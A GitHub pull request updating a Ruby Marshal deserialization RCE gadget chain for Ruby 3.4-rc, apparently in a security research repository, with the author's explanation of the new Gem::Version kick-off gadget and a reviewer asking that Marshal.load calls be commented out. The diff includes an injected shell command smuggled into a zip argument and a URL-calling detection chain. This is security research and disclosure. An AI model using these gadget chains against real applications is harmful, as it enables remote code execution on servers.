### PR TITLE
Updated ruby gadget for marshal loading

### PR DESCRIPTION
**Pull request by leonardo-doyensec**
Hello @p- , my name is Leonardo, I'm an Application Security Engineer @ Doyensec.
In the previous weeks I've doing some research around ruby deserialization, and I've noticed that the Marshal gadget was not working anymore on the latest ruby version. So I've adapted it.

Essentially the major change is that the kick-off gadget (`Gem::Specification`) is now calling `safe_load` making impossible to continue the exploit chain. 
Since the rest of the exploit is untouched, I've been searching for a similar gadget that called `to_s` once deserialized. I've found it in `Gem::Version`.
The only problem with it is that it will throw an exception after the folder creation (which is the first stage of the exploit). Hence two separate loads are required.

Another problem arising is that the `URI` module is not present anymore in ruby as default. Hence, we need to import `net/http`. I think this is a fair assumption since with this exploit we will target mostly web applications (whether rails or sinatra) that will import this module.

Contacts:
[Twitter](https://x.com/MaitaiThe)
[Doyensec](https://doyensec.com/)

### CODE REVIEW

File: marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb [hunk 1]
```diff
@@ -0,0 +1,124 @@
...
+
+puts detection_gadget_chain.unpack("H*")
+
+# You can comment from here if you want to simply detect the presence of the vulnerability.
+zip_param_to_execute = "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip" # replace with -TmTT=\"$(id>/tmp/marshal-poc)\"any.zip
+rce_gadget_chain = create_rce_gadget_chain(zip_param_to_execute)
+
+puts rce_gadget_chain.unpack("H*")
+
+Marshal.load(rce_gadget_chain)
```
Comment (p-) [inline marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb]:
```suggestion
#Marshal.load(rce_gadget_chain)
```

I prefer not immediately loading the gadget here (see [also](https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/blob/440261ed6f24d3d5a7a6620099bbd765c0a24b2d/marshal/3.2.4/marshal-rce-ruby-3.2.4.rb#L103)).

File: marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb [hunk 2]
```diff
@@ -0,0 +1,124 @@
...
+  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
+end
+
+url =  "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+detection_gadget_chain = create_detection_gadget_chain(url)
+
+begin
+  Marshal.load(detection_gadget_chain)
+  rescue
+end
```
Comment (p-) [inline marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb]:
```suggestion
#begin
  #Marshal.load(detection_gadget_chain)
  #rescue
#end
```

**Review by p- — CHANGES_REQUESTED** [review]
Hey @leonardo-doyensec 👋 

Sounds great!
I've added some minor nitpicks. (comment out calls of `marshal.load`)

Thanks!

**Comment by leonardo-doyensec** [comment]
Hello @p-, i've added the changes that you have requested

**Pull request merged**